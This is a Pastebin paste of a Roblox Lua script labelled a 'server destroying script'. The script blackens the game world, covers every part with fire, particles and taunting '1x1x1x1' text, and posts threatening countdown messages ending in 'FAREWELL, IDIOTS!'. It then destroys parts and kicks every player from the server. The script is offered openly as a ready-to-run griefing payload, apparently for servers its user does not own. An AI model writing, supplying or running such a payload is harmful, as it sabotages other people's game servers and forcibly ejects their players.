Advertisement
anphu04

1x1x1x1 server destroying script v2

Jul 6th, 2017
1,914
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 3.27 KB | None | 0 0
  1. -- Quick scan:
  2. -- This will just give you a brick-count and print it to your output
  3. -- Go in Solo or Online mode to get a dynamic GUI counter
  4.  
  5. local lighting = game:GetService("Lighting")
  6. lighting.Brightness = 0
  7. lighting.OutdoorAmbient = Color3.new(0,0,0)
  8. local sky = Instance.new("Sky", lighting)
  9. sky.SkyboxBk = "http://www.roblox.com/asset/?id=48020371"
  10. sky.SkyboxDn = "http://www.roblox.com/asset/?id=48020144"
  11. sky.SkyboxFt = "http://www.roblox.com/asset/?id=48020234"
  12. sky.SkyboxLf = "http://www.roblox.com/asset/?id=48020211"
  13. sky.SkyboxRt = "http://www.roblox.com/asset/?id=48020254"
  14. sky.SkyboxUp = "http://www.roblox.com/asset/?id=48020383"
  15. local music = Instance.new("Sound", game.Workspace)
  16. music.SoundId = "rbxassetid://150402649"
  17. music.Volume = 1
  18. music.Looped = true
  19. music.PlayOnRemove = true
  20. music:Play()
  21.  
  22. local parts = {}
  23. function scan(p)
  24. for _,target in pairs(p:GetChildren()) do
  25. if target:IsA("BasePart") then
  26. table.insert(parts,target) -- target is the actual parts!
  27. target.BrickColor = BrickColor.new("Really black")
  28. local sb = Instance.new("SelectionBox", target)
  29. sb.Color3 = Color3.new(255, 0, 0)
  30. sb.SurfaceColor3 = Color3.new(170, 0, 0)
  31. sb.Adornee = target
  32. local pe = Instance.new("ParticleEmitter", target)
  33. pe.Name = "10101110010011"
  34. pe.Texture = "rbxassetid://45524735"
  35. pe.Rate = 10
  36. pe.SpreadAngle = Vector2.new(-90, 90)
  37. local pe2 = Instance.new("ParticleEmitter", target)
  38. pe2.Name = "ERROR_._ER-__ORO_...."
  39. pe2.Texture = "rbxassetid://158293315"
  40. pe2.Rate = 10
  41. pe2.SpreadAngle = Vector2.new(-90, 90)
  42. local bb = Instance.new("BillboardGui", target)
  43. bb.Size = UDim2.new(50,0 , 25,0)
  44. bb.AlwaysOnTop = true
  45. local randomtext = {
  46. "1x1x1x1 !S B4CK",
  47. "101010110100101011101111010101",
  48. "_-ERROR-_"
  49. }
  50. local label = Instance.new("TextLabel", bb)
  51. label.Size = UDim2.new(1,0 , 1,0)
  52. label.TextScaled = true
  53. label.TextWrapped = true
  54. label.BackgroundTransparency = 1
  55. local brickcolor = BrickColor.new("Really red")
  56. label.TextColor3 = brickcolor.Color
  57. label.Font = "ArialBold"
  58. label.TextSize = 100
  59. local chosentext = randomtext[math.random(1, #randomtext)]
  60. label.Text = chosentext
  61. local fire = Instance.new("Fire", target)
  62. fire.Size = 30
  63. fire.Heat = 25
  64. end
  65. scan(target)
  66. end
  67. end
  68. scan(game.Workspace)
  69. --print(#parts .. (#parts == 1 and " brick " or " bricks ") .. "counted")
  70. parts = {}
  71. wait(1)
  72.  
  73.  
  74. local m = Instance.new("Message", game.Workspace)
  75. m.Text = "1x1x1x1 HAS RETURNED TO DESTROY ROBLOX!"
  76. wait(3)
  77. m.Text = "STARTING COUNTDOWN..."
  78. wait(2)
  79. m.Text = "ONCE THE TIMER REACH 0, THIS SERVER WILL NO LONGER EXIST!"
  80. wait(5)
  81.  
  82. local unit = 10
  83. wait(1)
  84. for i = 1, 10 do
  85. unit = unit - 1
  86. m.Text = "COUNTDOWN: " ..unit.. " SECONDS LEFT!"
  87. wait(1)
  88. end
  89.  
  90. m.Text = "FAREWELL, IDIOTS! MUAHAHAHAHAHAHAHA!!!"
  91.  
  92. local prey = nil
  93. local parts = script.Parent:GetChildren()
  94.  
  95. for i = 1,#parts do
  96. if (parts[i].className == "Part") then
  97. if (prey ~= nil)then
  98. prey:Destroy()
  99. end
  100. prey = parts[i]
  101. end
  102. end
  103.  
  104. for i, players in pairs(game.Players:GetChildren()) do
  105. players:Kick("010111010101000101011101010100010111101010010100010111101011010100101010101010101010101010101001010101011011010110100101010101010101011101")
  106. end
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement